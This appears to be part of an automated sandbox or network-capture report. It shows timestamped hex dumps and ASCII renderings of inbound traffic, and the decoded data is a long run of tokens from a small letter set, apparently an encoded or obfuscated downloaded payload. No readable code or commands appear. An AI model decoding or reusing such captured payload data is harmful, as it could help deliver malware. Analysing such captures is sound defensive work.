                                                            2021-10-29 18:10:59 UTC1780INData Raw: 51 45 20 4f 4f 51 20 4f 4f 6b 20 59 78 20 45 78 20 59 4b 20 4f 45 78 20 74 6b 20 4f 4f 52 20 4f 4f 74 20 74 74 20 4f 4f 52 20 4f 45 4b 20 4b 6f 20 6f 51 20 59 4b 20 6f 4f 59 20 74 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 59 78 20 6f 59 4f 20 6f 51 20 51 45 20 4f 6f 78 20 4f 4f 52 20 4f 4f 74 20 74 51 20 6b 6f 20 6b 51 20 6f 6b 20 59 6f 20 59 4b 20 4f 45 4b 20 4f 4f 45 20 45 78 20 52 59 20 4f 4f 6b 20 59 78 20 4f 4b 78 20 59 6f 20 51 45 20 4f 6f 78 20 4f 4f 52 20 4f 4f 74 20 6f 6f 20 6b 59 20 4f 4b 51 20 59 20 52 78 20 59 4b 20 6f 6f 4b 20 52 74 20 4f 74 78 20 74 78 20 4f 4f 6b 20 59 78 20 6f 78 4b 20 4f 20 74 6f 20 4f 4f 78 20 4f 4f 52 20 4f 4f 74 20 6f 59 6f 20 6b 78 20 6b 51 20 6f 6b 20 52 78 20 59 4b 20 4f 74 74 20 4f 78 51 20 4f 74 78 20 74 78 20 4f
                                                            Data Ascii: QE OOQ OOk Yx Ex YK OEx tk OOR OOt tt OOR OEK Ko oQ YK oOY tx OOt OxQ OOk Yx oYO oQ QE Oox OOR OOt tQ ko kQ ok Yo YK OEK OOE Ex RY OOk Yx OKx Yo QE Oox OOR OOt oo kY OKQ Y Rx YK ooK Rt Otx tx OOk Yx oxK O to OOx OOR OOt oYo kx kQ ok Rx YK Ott OxQ Otx tx O
                                                            2021-10-29 18:10:59 UTC1784INData Raw: 20 4f 4f 6f 20 51 59 20 6f 20 59 78 20 59 4b 20 4f 78 4b 20 4f 4f 4b 20 4f 6f 4b 20 4f 78 51 20 6f 45 20 59 78 20 4b 51 20 59 4f 20 59 4b 20 6b 4b 20 4f 52 45 20 74 45 20 4f 78 51 20 4f 4f 6f 20 51 59 20 4b 6b 20 59 51 20 59 4b 20 6f 4f 45 20 4f 4f 4b 20 6f 4b 4b 20 4f 78 51 20 51 52 20 59 78 20 4f 74 52 20 4f 74 20 59 4b 20 6b 4b 20 51 4f 20 4f 4f 74 20 4f 78 78 20 4f 4f 6f 20 4f 6b 45 20 4b 6b 20 4f 74 51 20 59 59 20 52 6b 20 4f 4f 4b 20 74 6b 20 4b 52 20 4f 4f 6f 20 59 78 20 6f 59 20 59 78 20 52 4f 20 6b 4b 20 6f 4b 51 20 4f 4f 74 20 6f 45 52 20 4f 4f 45 20 45 4b 20 4b 6b 20 4f 52 6f 20 74 20 6b 4b 20 4f 4f 4b 20 51 6f 20 4f 78 51 20 4f 6f 45 20 59 78 20 4f 6b 6b 20 59 78 20 4f 6b 45 20 6b 59 20 51 6b 20 4f 4f 74 20 4f 52 78 20 6b 6b 20 59 78 20 4b 6b
                                                            Data Ascii: OOo QY o Yx YK OxK OOK OoK OxQ oE Yx KQ YO YK kK ORE tE OxQ OOo QY Kk YQ YK oOE OOK oKK OxQ QR Yx OtR Ot YK kK QO OOt Oxx OOo OkE Kk OtQ YY Rk OOK tk KR OOo Yx oY Yx RO kK oKQ OOt oER OOE EK Kk ORo t kK OOK Qo OxQ OoE Yx Okk Yx OkE kY Qk OOt ORx kk Yx Kk
                                                            2021-10-29 18:10:59 UTC1788INData Raw: 59 78 20 4f 4f 4f 20 6b 59 20 6b 52 20 4f 4f 52 20 74 6f 20 4f 4f 4b 20 45 45 20 4b 51 20 59 78 20 59 4b 20 4f 78 20 4f 6f 45 20 4f 4f 74 20 4f 78 51 20 4b 4f 20 59 4f 20 6f 78 20 59 4f 20 4f 51 20 6b 52 20 51 74 20 4f 4f 52 20 4f 78 51 20 4f 4f 6f 20 74 4f 20 52 45 20 59 78 20 59 4b 20 4f 45 20 4f 4f 59 20 6b 4f 20 4f 78 6b 20 6b 59 20 4b 6b 20 45 59 20 59 4f 20 59 4b 20 6b 4b 20 6f 4b 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 78 74 20 4b 51 20 6f 6f 20 59 59 20 4f 4f 45 20 4f 4f 6f 20 4f 78 6f 20 4f 78 6b 20 4f 4f 6f 20 59 78 20 59 45 20 59 59 20 59 4b 20 6b 4b 20 4b 45 20 4f 4f 52 20 74 45 20 4f 4f 45 20 6f 45 20 59 78 20 45 45 20 59 59 20 6b 4b 20 4f 4f 4b 20 6f 45 4f 20 51 6b 20 4f 4f 6f 20 59 78 20 4f 78 59 20 59 4f 20 4f 6b 20 6b 59 20 6b 74 20
                                                            Data Ascii: Yx OOO kY kR OOR to OOK EE KQ Yx YK Ox OoE OOt OxQ KO YO ox YO OQ kR Qt OOR OxQ OOo tO RE Yx YK OE OOY kO Oxk kY Kk EY YO YK kK oKR OOt OxQ OOo Oxt KQ oo YY OOE OOo Oxo Oxk OOo Yx YE YY YK kK KE OOR tE OOE oE Yx EE YY kK OOK oEO Qk OOo Yx OxY YO Ok kY kt
                                                            2021-10-29 18:10:59 UTC1792INData Raw: 51 20 45 6f 20 59 4f 20 59 4b 20 4f 6b 6b 20 4f 78 59 20 6f 4f 4f 20 4f 78 51 20 4f 4f 45 20 59 78 20 45 59 20 4b 52 20 4f 4b 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 6b 45 20 4f 78 6b 20 59 6f 20 45 45 20 59 4f 20 59 4b 20 45 52 20 4f 4f 4f 20 4f 78 20 4f 6f 4b 20 4f 4f 45 20 59 78 20 4f 6b 52 20 4b 74 20 4f 4b 4b 20 6b 4b 20 52 59 20 4f 4f 52 20 6f 6f 6f 20 4f 6f 52 20 4f 6b 6f 20 45 45 20 4f 20 59 59 20 4f 6f 20 51 6b 20 6f 59 6f 20 4f 6f 4b 20 52 74 20 59 4f 20 52 4b 20 45 6b 20 4f 74 6b 20 52 51 20 52 59 20 4f 4f 52 20 4f 4f 78 20 4f 4f 51 20 4f 6b 6b 20 45 45 20 4f 20 59 59 20 4f 74 4b 20 4f 6f 74 20 6f 45 78 20 4f 6f 4b 20 52 74 20 59 4f 20 4f 51 52 20 59 52 20 4f 74 4b 20 52 51 20 52 59 20 4f 4f 52 20 6f 45 4f 20 4f 6f 52 20 4f 74 59 20 45 45 20 4f
                                                            Data Ascii: Q Eo YO YK Okk OxY oOO OxQ OOE Yx EY KR OKK kK OOY OOt kE Oxk Yo EE YO YK ER OOO Ox OoK OOE Yx OkR Kt OKK kK RY OOR ooo OoR Oko EE O YY Oo Qk oYo OoK Rt YO RK Ek Otk RQ RY OOR OOx OOQ Okk EE O YY OtK Oot oEx OoK Rt YO OQR YR OtK RQ RY OOR oEO OoR OtY EE O
                                                            2021-10-29 18:10:59 UTC1796INData Raw: 59 20 4f 4f 74 20 4f 59 20 74 45 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 4f 74 6b 20 4f 4f 59 20 4f 74 74 20 74 6b 20 4f 4f 45 20 59 78 20 52 20 59 78 20 6b 6f 20 4f 78 51 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 52 4b 20 4b 6b 20 4f 51 74 20 51 20 4f 6b 78 20 51 74 20 52 74 20 4f 78 51 20 4f 51 6f 20 4f 4f 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 6f 6f 74 20 4f 4f 74 20 4f 59 4b 20 74 51 20 6f 4f 45 20 45 59 20 4f 78 20 59 4b 20 4f 6f 20 74 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 74 74 20 59 78 20 6b 74 20 4f 78 59 20 4f 45 78 20 4f 78 6f 20 6b 74 20 4f 4f 6f 20 4f 4b 20 4f 4f 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 4b 4b 20 4f 78 51 20 6f 6f 6f 20 6f 4f 20 6f 78 74 20 45 45 20 51 20 6b 4b 20 4f 4b 20 74 6b 20 4f 78 51 20 4f
                                                            Data Ascii: Y OOt OY tE Yx Kk Yx YK Otk OOY Ott tk OOE Yx R Yx ko OxQ OOK OOt OxQ OOo ORK Kk OQt Q Okx Qt Rt OxQ OQo OO Kk Yx YK kK oot OOt OYK tQ oOE EY Ox YK Oo to OOt OxQ OOo Yx Ott Yx kt OxY OEx Oxo kt OOo OK OO Yx YK kK OOK oKK OxQ ooo oO oxt EE Q kK OK tk OxQ O
                                                            2021-10-29 18:10:59 UTC1800INData Raw: 6b 20 4f 59 6f 20 4f 6f 4f 20 4f 52 6b 20 59 78 20 59 6b 20 4f 78 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 6f 59 4f 20 4f 4f 6f 20 4f 78 45 20 4b 52 20 6f 6f 45 20 45 4b 20 4f 4b 45 20 4f 4f 4b 20 4f 78 59 20 59 45 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 52 78 20 6b 4b 20 4f 6f 51 20 4f 4f 59 20 4f 6f 6b 20 4f 78 78 20 6f 45 52 20 4b 6b 20 6b 20 4f 4f 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6f 45 78 20 59 78 20 4f 51 20 45 20 6f 4f 51 20 52 4b 20 4f 4b 74 20 4f 4f 74 20 45 45 20 4b 78 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 4f 51 4b 20 4f 4f 4b 20 6f 4b 59 20 4b 4b 20 4f 59 74 20 45 6b 20 6f 4f 6f 20 59 78 20 4f 78 4b 20 4f 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 52 4b 20 4b 6b 20 4f 4f 78 20 4b 51 20 4f 6b 59 20 4f
                                                            Data Ascii: k OYo OoO ORk Yx Yk OxR YK kK OOK OOt oYO OOo OxE KR ooE EK OKE OOK OxY YE OOo Yx Kk Yx ORx kK OoQ OOY Ook Oxx oER Kk k OOx kK OOK OOt OxQ oEx Yx OQ E oOQ RK OKt OOt EE Kx Yx Kk Yx YK OQK OOK oKY KK OYt Ek oOo Yx OxK Oo OOK OOt OxQ OOo ORK Kk OOx KQ OkY O
                                                            2021-10-29 18:10:59 UTC1804INData Raw: 4b 74 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 52 52 20 59 78 20 4f 4b 59 20 4f 78 4b 20 4f 6f 4b 20 51 51 20 45 45 20 4f 4f 45 20 59 78 20 4f 6b 45 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 6f 74 20 4f 78 51 20 4f 74 4b 20 6f 4b 20 45 6b 20 45 52 20 4f 6f 78 20 6b 59 20 6f 4b 4f 20 6f 4b 6f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 52 4b 20 52 6f 20 6f 51 20 4f 78 74 20 4f 78 4b 20 4f 6f 45 20 52 45 20 59 4f 20 4f 6f 6b 20 4f 6b 4f 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 6f 59 4f 20 4f 4f 6f 20 51 52 20 4b 4f 20 4f 74 20 45 6f 20 6f 74 20 4f 4f 59 20 4f 45 45 20 6f 45 4b 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 52 78 20 6b 4b 20 4b 4f 20 4f 78 6b 20 4f 6b 78 20 4f 6f 59 20 51 6b 20 4b 51 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b
                                                            Data Ascii: Kt OOt OxQ OOo Yx ORR Yx OKY OxK OoK QQ EE OOE Yx OkE Yx YK kK OOK oot OxQ OtK oK Ek ER Oox kY oKO oKo OxQ OOo Yx Kk ORK Ro oQ Oxt OxK OoE RE YO Ook OkO YK kK OOK OOt oYO OOo QR KO Ot Eo ot OOY OEE oEK OOo Yx Kk Yx ORx kK KO Oxk Okx OoY Qk KQ Yx YK kK OOK
                                                            2021-10-29 18:10:59 UTC1808INData Raw: 20 6f 6f 52 20 59 6f 20 6f 59 59 20 6b 4b 20 6f 4b 51 20 4f 4f 52 20 4f 74 4b 20 6f 78 51 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6f 4f 78 20 4f 6f 6f 20 4f 74 59 20 4f 78 74 20 51 52 20 59 78 20 4f 6b 74 20 59 4f 20 6f 59 78 20 6f 4b 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 6b 78 20 59 52 20 4f 45 59 20 52 6f 20 6f 6f 51 20 4f 78 78 20 6f 4b 51 20 4f 78 6b 20 4f 52 4b 20 4f 4b 74 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 6f 4b 4b 20 4f 6f 59 20 6f 78 6b 20 4f 6f 78 20 4f 45 74 20 45 6b 20 4f 51 78 20 59 59 20 4f 45 74 20 6f 4f 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 6b 6f 20 59 6b 20 4f 78 20 51 59 20 4f 6b 78 20 51 51 20 6f 6f 4b 20 4f 4f 45 20 6f 4f 59 20 4f 4b 59 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 4b 45 20 4f 78 4f
                                                            Data Ascii: ooR Yo oYY kK oKQ OOR OtK oxQ Yx Kk Yx YK oOx Ooo OtY Oxt QR Yx Okt YO oYx oKY OOK OOt OxQ OOo Okx YR OEY Ro ooQ Oxx oKQ Oxk ORK OKt Kk Yx YK kK oKK OoY oxk Oox OEt Ek OQx YY OEt oOO OOt OxQ OOo Yx Oko Yk Ox QY Okx QQ ooK OOE oOY OKY Yx YK kK OOK oKE OxO
                                                            2021-10-29 18:10:59 UTC1812INData Raw: 6b 20 4f 78 4f 20 45 59 20 4f 6f 74 20 6b 4f 20 6f 4f 74 20 4f 4f 52 20 6f 6f 4f 20 6f 4f 45 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6f 4f 78 20 4f 6f 6f 20 4f 6b 6b 20 4f 6f 4b 20 4f 78 74 20 59 78 20 4f 59 52 20 59 4f 20 4f 4b 6f 20 6f 4b 4f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 6b 78 20 59 52 20 6f 6f 74 20 45 51 20 6f 51 20 4f 4f 51 20 6f 4f 74 20 4f 78 6b 20 4f 74 74 20 4f 59 4f 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 6f 4b 4b 20 4f 6f 59 20 4f 4f 59 20 4f 4f 6f 20 4f 74 45 20 45 74 20 4f 59 51 20 59 59 20 4f 59 74 20 6f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 6b 6f 20 59 6b 20 4f 74 20 6b 4b 20 6f 4f 45 20 51 52 20 4f 51 6f 20 4f 4f 45 20 6f 6f 4b 20 4f 4b 51 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 4b 45 20 4f 78
                                                            Data Ascii: k OxO EY Oot kO oOt OOR ooO oOE Yx Kk Yx YK oOx Ooo Okk OoK Oxt Yx OYR YO OKo oKO OOK OOt OxQ OOo Okx YR oot EQ oQ OOQ oOt Oxk Ott OYO Kk Yx YK kK oKK OoY OOY OOo OtE Et OYQ YY OYt oOY OOt OxQ OOo Yx Oko Yk Ot kK oOE QR OQo OOE ooK OKQ Yx YK kK OOK oKE Ox
                                                            2021-10-29 18:10:59 UTC1816INData Raw: 4f 6f 59 20 6f 4f 52 20 4f 6f 78 20 6f 59 4f 20 4b 6b 20 6f 6f 59 20 59 59 20 74 6b 20 6f 4f 51 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 6b 6f 20 59 6b 20 4f 45 51 20 51 6f 20 51 6b 20 4f 4f 74 20 4f 51 78 20 4f 4f 45 20 4f 74 20 4f 59 45 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 4b 45 20 4f 78 4f 20 74 52 20 59 74 20 6f 4b 51 20 59 78 20 6f 6f 52 20 6b 59 20 6b 51 20 6f 6f 78 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 6b 78 20 52 6f 20 4f 52 20 4f 6f 4f 20 4f 78 4f 20 4f 78 51 20 4f 52 4b 20 59 4f 20 4b 20 4f 59 59 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 6f 45 59 20 4f 6f 78 20 6f 45 59 20 52 78 20 6f 59 4f 20 59 4b 20 4f 6f 51 20 4f 4f 59 20 74 45 20 4f 51 52 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 74 52 20 51 6f 20 4f 4b 74
                                                            Data Ascii: OoY oOR Oox oYO Kk ooY YY tk oOQ OOt OxQ OOo Yx Oko Yk OEQ Qo Qk OOt OQx OOE Ot OYE Yx YK kK OOK oKE OxO tR Yt oKQ Yx ooR kY kQ oox OxQ OOo Yx Kk Okx Ro OR OoO OxO OxQ ORK YO K OYY YK kK OOK OOt oEY Oox oEY Rx oYO YK OoQ OOY tE OQR OOo Yx Kk Yx OtR Qo OKt
                                                            2021-10-29 18:10:59 UTC1820INData Raw: 20 59 78 20 4f 6b 4f 20 6b 4b 20 4f 6f 45 20 4f 4f 51 20 4f 51 59 20 4f 78 4b 20 4f 78 6b 20 59 78 20 74 59 20 4f 59 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6f 4b 45 20 59 78 20 51 6b 20 4b 6b 20 6f 6f 4f 20 52 74 20 4b 59 20 4f 4f 51 20 6f 45 52 20 6f 4f 51 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6f 4f 78 20 4f 78 52 20 6f 59 4f 20 6b 51 20 4f 4f 74 20 59 78 20 6b 78 20 4b 6b 20 4f 59 78 20 6f 59 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 6f 4f 4f 20 4b 51 20 4f 45 4f 20 6f 4f 20 6b 59 20 4f 4f 4b 20 6f 78 20 4f 4f 4f 20 6f 4f 6f 20 4f 59 45 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4b 74 20 4f 4f 52 20 4f 52 4f 20 4b 6b 20 4b 4f 20 4b 6b 20 6b 45 20 59 6f 20 4b 20 6f 6f 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6f 78 51 20
                                                            Data Ascii: Yx OkO kK OoE OOQ OQY OxK Oxk Yx tY OYt kK OOK OOt OxQ oKE Yx Qk Kk ooO Rt KY OOQ oER oOQ Yx Kk Yx YK oOx OxR oYO kQ OOt Yx kx Kk OYx oYY OOK OOt OxQ OOo oOO KQ OEO oO kY OOK ox OOO oOo OYE Kk Yx YK kK OKt OOR ORO Kk KO Kk kE Yo K ooE OOt OxQ OOo Yx oxQ
                                                            2021-10-29 18:10:59 UTC1824INData Raw: 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 74 6f 20 74 6b 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 52 4f 20 51 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 74 6f 20 74 6b 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 52 4f 20 51 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 74 6f 20 74 6b 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 52 4f 20 51 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 74 6f 20 74 6b 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 52 4f 20 51 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51
                                                            Data Ascii: OxQ OOK Yx OYQ Ox YK kK OOE OOt to tk Yx Kk YO YK RO QE OOt OxQ OOK Yx OYQ Ox YK kK OOE OOt to tk Yx Kk YO YK RO QE OOt OxQ OOK Yx OYQ Ox YK kK OOE OOt to tk Yx Kk YO YK RO QE OOt OxQ OOK Yx OYQ Ox YK kK OOE OOt to tk Yx Kk YO YK RO QE OOt OxQ OOK Yx OYQ
                                                            2021-10-29 18:10:59 UTC1828INData Raw: 20 4f 4f 6b 20 4f 4f 74 20 52 6b 20 74 4f 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 6f 59 6f 20 51 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 59 6f 20 6f 74 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4f 51 74 20 6b 51 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 4f 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 4f 51 20 6f 4f 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4b 6f 20 6b 74 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 4f 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 4f 51 20 6f 4f 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 52 78 20 6b 51 20 59 78 20 4b 6b 20 4b 6b 20 59 4b 20 6f 6f 78 20 51 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 4f 51 20 6f 4f 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4b 6f 20
                                                            Data Ascii: OOk OOt Rk tO Yx Kk YO YK oYo QO OOt OxQ OOE Yx OYo ot YK kK OOY OOt OQt kQ Yx Kk YO YK OQ kY OOt OxQ OOE Yx OOQ oO YK kK OOY OOt Ko kt Yx Kk YO YK OQ kY OOt OxQ OOE Yx OOQ oO YK kK OOY OOt Rx kQ Yx Kk Kk YK oox QO OOt OxQ OOE Yx OOQ oO YK kK OOY OOt Ko
                                                            2021-10-29 18:10:59 UTC1832INData Raw: 74 20 4f 78 51 20 4f 4f 74 20 59 78 20 4f 45 20 4f 59 20 59 4b 20 6b 4b 20 4f 4f 52 20 4f 4f 74 20 51 6f 20 74 74 20 59 78 20 4b 6b 20 59 45 20 59 4b 20 6f 4b 6b 20 59 78 20 4f 4f 74 20 4f 78 51 20 4f 6f 78 20 59 78 20 4f 4b 6b 20 4f 4f 4b 20 59 4b 20 6b 4b 20 4f 6f 45 20 4f 4f 74 20 6f 4b 4b 20 74 6f 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 6f 4f 45 20 51 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 4f 51 20 4f 4f 6f 20 59 4b 20 4f 4f 52 20 4f 4f 45 20 4f 4f 74 20 6f 78 45 20 6b 6f 20 4b 6b 20 4b 6b 20 59 4b 20 59 4b 20 51 6b 20 4b 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 74 20 59 78 20 4f 45 20 4f 59 20 59 4b 20 6b 4b 20 4f 4f 52 20 4f 4f 74 20 51 6f 20 74 74 20 59 78 20 4b 6b 20 59 45 20 59 4b 20 6f 4b 6b 20 59 78 20 4f 4f 74 20 4f 78 51 20 4f 6f 78
                                                            Data Ascii: t OxQ OOt Yx OE OY YK kK OOR OOt Qo tt Yx Kk YE YK oKk Yx OOt OxQ Oox Yx OKk OOK YK kK OoE OOt oKK to Yx Kk YO YK oOE QK OOt OxQ OOK Yx OOQ OOo YK OOR OOE OOt oxE ko Kk Kk YK YK Qk Kk OOt OxQ OOt Yx OE OY YK kK OOR OOt Qo tt Yx Kk YE YK oKk Yx OOt OxQ Oox
                                                            2021-10-29 18:10:59 UTC1836INData Raw: 4f 51 20 51 6f 20 6f 59 20 4f 4f 52 20 4f 4b 74 20 59 4f 20 59 59 20 45 4f 20 45 6f 20 4f 4f 6b 20 4f 6b 59 20 4f 78 51 20 6f 45 74 20 4f 45 20 4f 74 6b 20 59 4b 20 6f 78 74 20 6b 4b 20 6f 59 6f 20 52 59 20 4f 78 6b 20 4f 4f 6f 20 6f 4b 45 20 59 78 20 4f 45 45 20 45 4f 20 6f 4f 4b 20 4f 4f 6b 20 4f 4f 52 20 4f 4f 78 20 74 45 20 45 20 4f 6b 6b 20 59 4b 20 6f 78 74 20 6b 4b 20 4f 52 6f 20 4f 78 4b 20 6f 59 6f 20 4f 4f 52 20 51 51 20 4b 6b 20 59 59 20 45 4f 20 4f 59 74 20 4f 4f 4b 20 4f 51 52 20 4f 4f 78 20 6f 59 4b 20 52 20 45 6f 20 59 78 20 4f 4b 45 20 6b 74 20 45 6b 20 4b 51 20 6f 78 74 20 4f 4f 52 20 6f 59 4f 20 59 4f 20 4f 6b 6b 20 6f 20 6f 59 45 20 4f 4f 6b 20 4f 52 4f 20 4f 78 51 20 6f 59 4b 20 52 20 6f 4b 78 20 59 4b 20 6f 45 51 20 6b 74 20 45 51 20
                                                            Data Ascii: OQ Qo oY OOR OKt YO YY EO Eo OOk OkY OxQ oEt OE Otk YK oxt kK oYo RY Oxk OOo oKE Yx OEE EO oOK OOk OOR OOx tE E Okk YK oxt kK ORo OxK oYo OOR QQ Kk YY EO OYt OOK OQR OOx oYK R Eo Yx OKE kt Ek KQ oxt OOR oYO YO Okk o oYE OOk ORO OxQ oYK R oKx YK oEQ kt EQ
                                                            2021-10-29 18:10:59 UTC1840INData Raw: 20 6f 6f 6f 20 4b 51 20 4f 6b 6b 20 6f 20 45 6f 20 4f 4f 4b 20 6f 78 4b 20 4f 4f 4f 20 59 4b 20 4f 4f 4b 20 59 52 20 52 45 20 4f 4f 51 20 6b 52 20 6f 4b 59 20 52 74 20 4f 6f 78 20 4f 6f 59 20 4f 51 20 59 45 20 4f 59 4b 20 4f 20 74 51 20 4f 6f 74 20 51 6f 20 4f 78 4b 20 6f 4b 78 20 52 20 4f 74 20 52 45 20 4f 51 4b 20 6b 59 20 4b 20 74 4b 20 74 4b 20 4f 4f 6f 20 45 20 59 45 20 6f 45 20 4f 78 20 4f 78 45 20 4f 6f 74 20 51 6f 20 4f 4f 4f 20 4f 74 59 20 4f 4f 6f 20 51 20 52 45 20 45 4f 20 6b 52 20 4f 52 4f 20 51 59 20 6b 6f 20 4f 6f 59 20 4f 4f 59 20 59 45 20 51 52 20 4f 6b 20 4b 20 4f 6f 74 20 59 6f 20 4f 78 4b 20 52 78 20 4f 4f 4b 20 59 45 20 59 78 20 4f 4f 51 20 6b 4f 20 6f 45 74 20 6b 52 20 59 6b 20 4f 6f 59 20 4f 6f 45 20 59 45 20 6f 4f 20 6f 52 20 51 20
                                                            Data Ascii: ooo KQ Okk o Eo OOK oxK OOO YK OOK YR RE OOQ kR oKY Rt Oox OoY OQ YE OYK O tQ Oot Qo OxK oKx R Ot RE OQK kY K tK tK OOo E YE oE Ox OxE Oot Qo OOO OtY OOo Q RE EO kR ORO QY ko OoY OOY YE QR Ok K Oot Yo OxK Rx OOK YE Yx OOQ kO oEt kR Yk OoY OoE YE oO oR Q
                                                            2021-10-29 18:10:59 UTC1844INData Raw: 78 20 4f 59 4f 20 6b 6f 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 4f 4b 59 20 59 4b 20 4f 4b 59 20 59 4b 20 4f 59 6f 20 4f 4f 4f 20 6f 6f 78 20 4f 78 74 20 4f 51 59 20 59 78 20 4f 4f 78 20 4b 78 20 6f 4b 74 20 6b 6f 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 6f 59 4f 20 59 4b 20 4f 6f 51 20 59 4b 20 59 6b 20 4f 78 4b 20 4f 4b 6b 20 4f 78 74 20 59 4f 20 59 78 20 4f 51 6b 20 52 4f 20 6f 6f 45 20 6b 6f 20 4f 51 45 20 4f 4f 74 20 4f 51 20 4f 78 52 20 59 4f 20 59 59 20 4f 4f 45 20 59 4b 20 4f 52 6f 20 4f 6f 59 20 4f 6f 4b 20 4f 78 52 20 4f 51 59 20 59 78 20 4f 51 78 20 4b 78 20 6f 45 20 6b 45 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 6f 74 20 59 59 20 4f 6f 51 20 59 4b 20 6f 78 6f 20 4f 78 4b 20 59 6f 20 4f 78 52 20 59 4f 20 59 78 20 4f 51 6b
                                                            Data Ascii: x OYO ko KQ OOt OYY Oot OKY YK OKY YK OYo OOO oox Oxt OQY Yx OOx Kx oKt ko KQ OOt OYY Oot oYO YK OoQ YK Yk OxK OKk Oxt YO Yx OQk RO ooE ko OQE OOt OQ OxR YO YY OOE YK ORo OoY OoK OxR OQY Yx OQx Kx oE kE KQ OOt OYY Oot ot YY OoQ YK oxo OxK Yo OxR YO Yx OQk
